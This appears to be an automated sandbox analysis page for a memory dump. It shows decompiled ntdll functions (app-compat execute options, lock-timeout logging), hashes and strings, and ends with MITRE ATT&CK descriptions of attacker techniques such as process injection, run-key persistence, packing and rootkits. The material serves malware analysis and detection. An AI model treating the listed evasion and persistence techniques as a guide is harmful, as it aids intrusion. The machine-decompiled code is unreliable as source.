Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 72c92343e618d7c496745bc832297febd9bd52d204d742cb537e97687cbeba7c
Instruction ID: 0d271833616699cc935f9037eac6fac82c9a845fc02e33dc6035b2a2306078a2
Opcode Fuzzy Hash: 72c92343e618d7c496745bc832297febd9bd52d204d742cb537e97687cbeba7c
Instruction Fuzzy Hash: F861F5A1A00526ABDB10DFA8CC8097EF7BCFF48704B20816AF855D3645D774DE58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CC40FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E02CC40FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x2dbd360 ^ _t107;
				_v8 =  *0x2dbd360 ^ _t107;
				_t105 = __ecx;
				if( *0x2db84d4 == 0) {
					L5:
					return E02D0B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E02CDE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E02CC42EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E02CC41EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E02D096C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E02CC429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E02D55720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E02D0FA60( &_v548, 0, 0x214);
						_t106 =  *0x2db84d4;
						_t110 = _t108 + 0x20;
						 *0x2dbb1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x2db84d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E02D0B75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E02D55720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E02D11480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E02D55720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E02D11150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E02D55720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E02D43E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E02D55720();
						goto L15;
					}
					L8:
					_t56 = E02CC41F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x02cc410d
0x02cc410f
0x02cc411c
0x02cc411e
0x02cc4158
0x02cc4168
0x02cc4168
0x02cc4126
0x02cc4130
0x02cc413c
0x02d204a2
0x02cc4142
0x02cc414b
0x02cc414b
0x02cc414f
0x02cc416b
0x02cc4171
0x02cc4176
0x02cc4178
0x02cc41d0
0x02cc41d2
0x02cc41d3
0x02cc41a7
0x02cc41ae
0x02cc41b0
0x02cc41db
0x02cc41b2
0x02cc41b8
0x02cc41bf
0x02cc41c1
0x02cc41c1
0x02cc41c1
0x02cc41c3
0x02cc41c5
0x02cc41df
0x02cc41e2
0x02cc41e2
0x02cc41c7
0x02cc41c9
0x02d20628
0x02d20628
0x02d20630
0x02d20631
0x02d20633
0x02d20635
0x02d20635
0x00000000
0x02cc41c9
0x02cc417d
0x02cc4183
0x02cc4189
0x02cc418e
0x02cc4190
0x02d204a9
0x02d204af
0x00000000
0x00000000
0x02d204b5
0x02d204c8
0x02d204d5
0x02d204e5
0x02d204ea
0x02d204f6
0x02d20518
0x02d2051e
0x02d20520
0x02d20522
0x00000000
0x00000000
0x02d20528
0x02d2052e
0x02d20530
0x00000000
0x00000000
0x02d2053b
0x02d2053d
0x00000000
0x00000000
0x02d20545
0x02d2054c
0x02d2054e
0x02d20623
0x00000000
0x02d20623
0x02d20556
0x02d20557
0x02d2056f
0x02d20574
0x02d20583
0x02d2058a
0x02d2058b
0x02d2058d
0x02d205b5
0x02d205c0
0x02d205c6
0x02d205c8
0x02d205cb
0x02d205cd
0x02d205d3
0x02d205d5
0x00000000
0x00000000
0x00000000
0x00000000
0x02d205db
0x02d205db
0x02d205e3
0x02d205e7
0x02d205e9
0x02d205eb
0x02d205ed
0x02d205ed
0x02d205fa
0x02d205ff
0x02d20606
0x02d2060b
0x02d2060d
0x00000000
0x00000000
0x02d20613
0x02d20613
0x02d20616
0x02d20616
0x00000000
0x02d2061e
0x02d2058f
0x02d20594
0x02d20596
0x02d20598
0x00000000
0x02d2059d
0x02cc4196
0x02cc4198
0x02cc419d
0x02cc419f
0x00000000
0x00000000
0x02cc41a1
0x00000000
0x02cc4151
0x02cc4151
0x02cc4151
0x00000000
0x02cc4151

Strings

Execute=1, xrefs: 02D2057D
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D2058F
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D20566
ExecuteOptions, xrefs: 02D2050A
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D204BF
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D205AC
CLIENT(ntdll): Processing section info %ws..., xrefs: 02D205F1

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 25460339a90dfc545a83d581f3fa6e9fc913dcf43bf24580db279f45177b0b66
Instruction ID: 36abea72871f46bf6e9ffc0fa12d3a618452b8320338f66367e90ed2e6944305
Opcode Fuzzy Hash: 25460339a90dfc545a83d581f3fa6e9fc913dcf43bf24580db279f45177b0b66
Instruction Fuzzy Hash: 42614731A00219BAEF35DA94ECA5FA973ADEF64308F1440ADD945A7380DB709F45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02CC77A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E02CC77A0(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t16;
				char _t17;
				char _t21;
				void* _t23;
				char _t28;
				intOrPtr* _t30;
				char _t32;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t39;
				char _t42;
				signed int _t49;
				signed int _t50;
				void* _t51;

				_t37 = __edx;
				_t50 = _t49 & 0xfffffff8;
				_push(__ecx);
				_t39 = _a4;
				_t30 = _t39 + 0x28;
				_t42 =  *_t30;
				if(_t42 < 0) {
					_t34 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t39 + 0x2c)) -  *((intOrPtr*)(_t34 + 0x24));
					if( *((intOrPtr*)(_t39 + 0x2c)) !=  *((intOrPtr*)(_t34 + 0x24))) {
						while(1) {
							L7:
							__eflags = _t42;
							if(_t42 >= 0) {
								goto L1;
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L19:
								_t17 = 0;
								L3:
								return _t17;
							}
							_t18 =  *((intOrPtr*)(_t39 + 0x34));
							_t36 = _t39 + 0x1c;
							 *((intOrPtr*)(_t18 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 0x34)) + 0x14)) + 1;
							asm("lock inc dword [ecx]");
							_t42 =  *_t30;
							__eflags = _t42;
							if(_t42 < 0) {
								L11:
								_t32 = 0;
								__eflags = 0;
								while(1) {
									asm("sbb esi, esi");
									_t47 =  !( ~( *(_t39 + 0x30) & 1)) & 0x02db79c8;
									_push( !( ~( *(_t39 + 0x30) & 1)) & 0x02db79c8);
									_push(0);
									_push( *((intOrPtr*)(_t39 + 0x18)));
									_t21 = E02D09520();
									__eflags = _t21 - 0x102;
									if(_t21 != 0x102) {
										break;
									}
									_t23 = E02D0CE00( *_t47,  *((intOrPtr*)(_t47 + 4)), 0xff676980, 0xffffffff);
									_push(_t37);
									_push(_t23);
									E02D55720(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t32);
									E02D55720(0x65, 0, "RTL: Resource at %p\n", _t39);
									_t51 = _t50 + 0x28;
									_t32 = _t32 + 1;
									__eflags = _t32 - 2;
									if(__eflags > 0) {
										_t36 = _t39;
										E02D5FFB9(_t32, _t39, _t37, _t39, 0, __eflags);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02D55720();
									_t50 = _t51 + 0xc;
								}
								_t30 = _t39 + 0x28;
								__eflags = _t21;
								if(_t21 < 0) {
									L02D1DF30(_t36, _t37, _t21);
									goto L19;
								}
								_t42 =  *_t30;
								continue;
							}
							_t28 = E02D047E7(_t36);
							__eflags = _t28;
							if(_t28 != 0) {
								continue;
							}
							goto L11;
						}
						goto L1;
					}
					asm("lock dec dword [ebx]");
					L2:
					_t17 = 1;
					goto L3;
				}
				L1:
				_t16 = _t42;
				asm("lock cmpxchg [ebx], ecx");
				if(_t16 != _t42) {
					_t42 = _t16;
					goto L7;
				}
				goto L2;
			}

0x02cc77a0
0x02cc77a5
0x02cc77a8
0x02cc77ac
0x02cc77af
0x02cc77b2
0x02cc77b6
0x02cc77d4
0x02cc77de
0x02cc77e1
0x02d228f2
0x02d228f2
0x02d228f2
0x02d228f4
0x00000000
0x00000000
0x02d228fa
0x02d228fe
0x02d229ae
0x02d229ae
0x02cc77cb
0x02cc77d1
0x02cc77d1
0x02d22904
0x02d22907
0x02d2290a
0x02d2290d
0x02d22910
0x02d22912
0x02d22914
0x02d2291f
0x02d2291f
0x02d2291f
0x02d22921
0x02d2292b
0x02d2292f
0x02d22935
0x02d22936
0x02d22938
0x02d2293b
0x02d22940
0x02d22945
0x00000000
0x00000000
0x02d22953
0x02d22958
0x02d22959
0x02d22965
0x02d22973
0x02d22978
0x02d2297b
0x02d2297c
0x02d2297f
0x02d22981
0x02d22983
0x02d22983
0x02d22988
0x02d2298d
0x02d2298e
0x02d22990
0x02d22995
0x02d22995
0x02d2299a
0x02d2299d
0x02d2299f
0x02d229a9
0x00000000
0x02d229a9
0x02d229a1
0x00000000
0x02d229a1
0x02d22916
0x02d2291b
0x02d2291d
0x00000000
0x00000000
0x00000000
0x02d2291d
0x00000000
0x02d228f2
0x02cc77e7
0x02cc77c9
0x02cc77c9
0x00000000
0x02cc77c9
0x02cc77b8
0x02cc77bb
0x02cc77bd
0x02cc77c3
0x02d228f0
0x00000000
0x02d228f0
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D22953

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D2295B
RTL: Resource at %p, xrefs: 02D2296B
RTL: Re-Waiting, xrefs: 02D22988

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 12d7d6e7f88f5390ecd64a3055e83227404a5b98113f7f2bdee4c3c4e7866b15
Instruction ID: 3a986442cbc222f1049ea506a9311ae84139adcea51dd8f52e54e0b17254e924
Opcode Fuzzy Hash: 12d7d6e7f88f5390ecd64a3055e83227404a5b98113f7f2bdee4c3c4e7866b15
Instruction Fuzzy Hash: 27312431A40631ABDB224A12CC84F6BBB69EF55B28F500258FD456B780CB11FC19CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02D01CC7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02D01CC7(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t91;
				intOrPtr _t95;
				short _t96;
				intOrPtr _t104;
				intOrPtr _t111;
				short _t119;
				signed int _t131;
				intOrPtr _t134;
				intOrPtr _t138;
				intOrPtr* _t144;
				intOrPtr* _t147;
				intOrPtr* _t149;
				void* _t151;

				_t139 = __edx;
				_push(0x154);
				_push(0x2da0348);
				E02D1D0E8(__ebx, __edi, __esi);
				 *(_t151 - 0xf0) = __edx;
				_t147 = __ecx;
				 *((intOrPtr*)(_t151 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t151 - 0xf8)) =  *((intOrPtr*)(_t151 + 8));
				 *((intOrPtr*)(_t151 - 0xe8)) =  *((intOrPtr*)(_t151 + 0xc));
				 *((intOrPtr*)(_t151 - 0xf4)) =  *((intOrPtr*)(_t151 + 0x10));
				 *((intOrPtr*)(_t151 - 0xe4)) = 0;
				 *((intOrPtr*)(_t151 - 0xdc)) = 0;
				 *((intOrPtr*)(_t151 - 0xd8)) = 0;
				 *(_t151 - 0xe0) = 0;
				 *((intOrPtr*)(_t151 - 0x140)) = 0x40;
				E02D0FA60(_t151 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t151 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t151 - 0x160)) = 1;
				_t131 = 7;
				memset(_t151 - 0x15c, 0, _t131 << 2);
				_t144 =  *((intOrPtr*)(_t151 - 0xe8));
				_t91 = E02CE2430(1, _t147, 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
				_t148 = _t91;
				if(_t91 >= 0) {
					if( *0x2db8460 != 0 && ( *(_t151 - 0xe0) & 0x00000001) == 0) {
						_t95 = E02CE2D50(7, 0, 2,  *((intOrPtr*)(_t151 - 0xfc)), _t151 - 0x140);
						_t148 = _t95;
						if(_t95 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
							if(( *(_t151 - 0x118) & 0x00000001) == 0) {
								if(( *(_t151 - 0x118) & 0x00000002) != 0) {
									 *(_t151 - 0x120) = 0xfffffffc;
								}
							} else {
								 *(_t151 - 0x120) =  *(_t151 - 0x120) & 0x00000000;
							}
							_t134 =  *((intOrPtr*)(_t151 - 0x114));
							_t96 =  *((intOrPtr*)(_t134 + 0x5c));
							 *((short*)(_t151 - 0xda)) = _t96;
							 *((short*)(_t151 - 0xdc)) = _t96;
							 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t134 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
							 *((intOrPtr*)(_t151 - 0xe8)) = _t151 - 0xd0;
							 *((short*)(_t151 - 0xea)) = 0xaa;
							_t104 = E02CD4720(_t139,  *(_t151 - 0xf0) & 0x0000ffff, _t151 - 0xec, 2, 0);
							_t148 = _t104;
							if(_t104 < 0 || E02CD9660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
								goto L1;
							} else {
								_t149 =  *0x2db8460; // 0x7478ff90
								 *0x2dbb1e0( *(_t151 - 0x120),  *(_t151 - 0xf0), _t151 - 0xe4);
								_t148 =  *_t149();
								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
								if(_t148 < 0) {
									goto L1;
								}
								_t111 =  *((intOrPtr*)(_t151 - 0xe4));
								if(_t111 == 0xffffffff) {
									L25:
									 *((intOrPtr*)(_t151 - 4)) = 1;
									_t144 =  *0x2db8468;
									if(_t144 != 0) {
										 *0x2dbb1e0(_t111);
										 *_t144();
									}
									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
									goto L1;
								}
								E02CDF540(_t151 - 0x164, _t111);
								 *((intOrPtr*)(_t151 - 4)) = 0;
								if( *((intOrPtr*)(_t144 + 4)) != 0) {
									L02CE2400(_t144);
								}
								_t145 =  *((intOrPtr*)(_t151 - 0xfc));
								_t148 = E02CE2430(0,  *((intOrPtr*)(_t151 - 0xfc)), 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
								if(_t148 < 0) {
									L24:
									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
									_t111 = E02D3D704();
									goto L25;
								} else {
									_t148 = E02CE2D50(7, 0, 2, _t145, _t151 - 0x140);
									 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
									if(_t148 < 0) {
										goto L24;
									}
									if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
										_t138 =  *((intOrPtr*)(_t151 - 0x114));
										_t119 =  *((intOrPtr*)(_t138 + 0x5c));
										 *((short*)(_t151 - 0xda)) = _t119;
										 *((short*)(_t151 - 0xdc)) = _t119;
										 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t138 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
										if(E02CD9660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
											goto L24;
										}
										_t148 = 0xc0150004;
										L23:
										 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
										goto L24;
									}
									_t148 = 0xc0150005;
									goto L23;
								}
							}
						}
						_t148 = 0xc0150005;
					}
				}
				L1:
				return E02D1D130(1, _t144, _t148);
			}

0x02d01cc7
0x02d01cc7
0x02d01ccc
0x02d01cd1
0x02d01cd6
0x02d01cdc
0x02d01cde
0x02d01ce7
0x02d01cf0
0x02d01cf9
0x02d01d01
0x02d01d09
0x02d01d0f
0x02d01d15
0x02d01d1b
0x02d01d2f
0x02d01d37
0x02d01d44
0x02d01d4c
0x02d01d55
0x02d01d68
0x02d01d78
0x02d01d7d
0x02d01d81
0x02d3d4e3
0x02d3d509
0x02d3d50e
0x02d3d512
0x00000000
0x00000000
0x02d3d51e
0x02d3d531
0x02d3d543
0x02d3d545
0x02d3d545
0x02d3d533
0x02d3d533
0x02d3d533
0x02d3d54f
0x02d3d555
0x02d3d559
0x02d3d560
0x02d3d570
0x02d3d57c
0x02d3d587
0x02d3d5a3
0x02d3d5a8
0x02d3d5ac
0x00000000
0x02d3d5ce
0x02d3d5e1
0x02d3d5e9
0x02d3d5f1
0x02d3d5f3
0x02d3d5fb
0x00000000
0x00000000
0x02d3d601
0x02d3d60a
0x02d3d6e1
0x02d3d6e1
0x02d3d6e4
0x02d3d6ec
0x02d3d6f1
0x02d3d6f7
0x02d3d6f7
0x02d3d730
0x00000000
0x02d3d730
0x02d3d618
0x02d3d61f
0x02d3d625
0x02d3d628
0x02d3d628
0x02d3d644
0x02d3d651
0x02d3d653
0x02d3d65b
0x02d3d6d5
0x02d3d6d5
0x02d3d6dc
0x00000000
0x02d3d65d
0x02d3d670
0x02d3d672
0x02d3d67a
0x00000000
0x00000000
0x02d3d682
0x02d3d68b
0x02d3d691
0x02d3d695
0x02d3d69c
0x02d3d6ac
0x02d3d6c8
0x00000000
0x00000000
0x02d3d6ca
0x02d3d6cf
0x02d3d6cf
0x00000000
0x02d3d6cf
0x02d3d684
0x00000000
0x02d3d684
0x02d3d65b
0x02d3d5ac
0x02d3d520
0x02d3d520
0x02d3d4e3
0x02d01d87
0x02d01d8e

Strings

$, xrefs: 02D01D37
@, xrefs: 02D01D1B

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 798a0715a2eb0634bb11ded581b77345a6878b5b2d739f58553f61a51bc9dfcc
Instruction ID: 859f1879d89c349accd32687217b5f48ea59e83715676f4c6e8c37db5dd51a22
Opcode Fuzzy Hash: 798a0715a2eb0634bb11ded581b77345a6878b5b2d739f58553f61a51bc9dfcc
Instruction Fuzzy Hash: 6F812871D00269DBDB228F54CC44BEEB6B9AF09714F1441EAAA1DB7290D7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02D5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02D0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02D55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02D55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02d5fdda
0x02d5fde2
0x02d5fde5
0x02d5fdec
0x02d5fdfa
0x02d5fdff
0x02d5fe0a
0x02d5fe0f
0x02d5fe17
0x02d5fe1e
0x02d5fe19
0x02d5fe19
0x02d5fe19
0x02d5fe20
0x02d5fe21
0x02d5fe22
0x02d5fe25
0x02d5fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D5FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D5FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D5FE2B

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 15dd3ee8de3dd106c4c2f253a8fa8a74afd9de504d2913c6db85ecd1c0fa16c8
Instruction ID: f86e5271d8d29654b77702a570646ae2eca289ee5c748d433ca4df45183ff1f8
Opcode Fuzzy Hash: 15dd3ee8de3dd106c4c2f253a8fa8a74afd9de504d2913c6db85ecd1c0fa16c8
Instruction Fuzzy Hash: ADF0F632200611BFEA211A55DC02F63BF5FEB45730F240315FA295A6E1DAA2FC60C6F1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
